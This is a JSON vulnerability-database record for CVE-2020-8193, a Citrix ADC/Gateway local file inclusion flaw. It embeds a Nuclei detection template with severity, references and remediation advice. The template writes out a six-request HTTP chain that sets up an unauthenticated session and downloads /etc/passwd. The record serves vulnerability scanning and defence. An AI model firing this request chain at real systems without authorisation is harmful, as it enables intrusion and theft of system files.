{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2020-8193/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2020-8193/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2020-8193/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2020-8193/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2020-8193/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2020-8193"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2020-8193"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2020/CVE-2020-8193.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2020-8193\n\ninfo:\n  name: Citrix - Local File Inclusion\n  author: pdteam\n  severity: medium\n  description: Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.\n  impact: |\n    An attacker can access sensitive information stored on the server, potentially leading to further exploitation or unauthorized access.\n  remediation: |\n    Apply the latest security patches or updates provided by Citrix to fix the local file inclusion vulnerability.\n  reference:\n    - https://github.com/jas502n/CVE-2020-8193\n    - http://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html\n    - https://support.citrix.com/article/CTX276688\n    - https://nvd.nist.gov/vuln/detail/CVE-2020-8193\n    - https://github.com/0ps/pocassistdb\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2020-8193\n    cwe-id: CWE-287,CWE-284\n    epss-score: 0.88411\n    epss-percentile: 0.99765\n    cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 6\n    vendor: citrix\n    product: application_delivery_controller_firmware\n  tags: cve2020,cve,citrix,lfi,kev,packetstorm,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n        X-NITRO-USER: xpyZxwy6\n        X-NITRO-PASS: xWXHUJ56\n\n        <appfwprofile><login></login></appfwprofile>\n      - |\n        GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        GET /menu/neo HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        GET /menu/stc HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n        X-NITRO-USER: oY39DXzQ\n        X-NITRO-PASS: ZuU9Y9c1\n        rand_key: {{randkey}}\n\n        <appfwprofile><login></login></appfwprofile>\n      - |\n        POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/xml\n        X-NITRO-USER: oY39DXzQ\n        X-NITRO-PASS: ZuU9Y9c1\n        rand_key: {{randkey}}\n\n        <clipermission></clipermission>\n\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n    extractors:\n      - type: regex\n        name: randkey # dynamic variable\n        regex:\n          - \"(?m)[0-9]{3,10}\\\\.[0-9]+\"\n        internal: true\n        part: body\n# digest: 4a0a0047304502202f07df70993187851f5b67b8f2a7af9318232496cf832481b3bb549891c5f030022100f3468b43baf63b2a83b08e5cd8551038bf674c62e1b8f356e3030120f9080828:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2020-8193"
}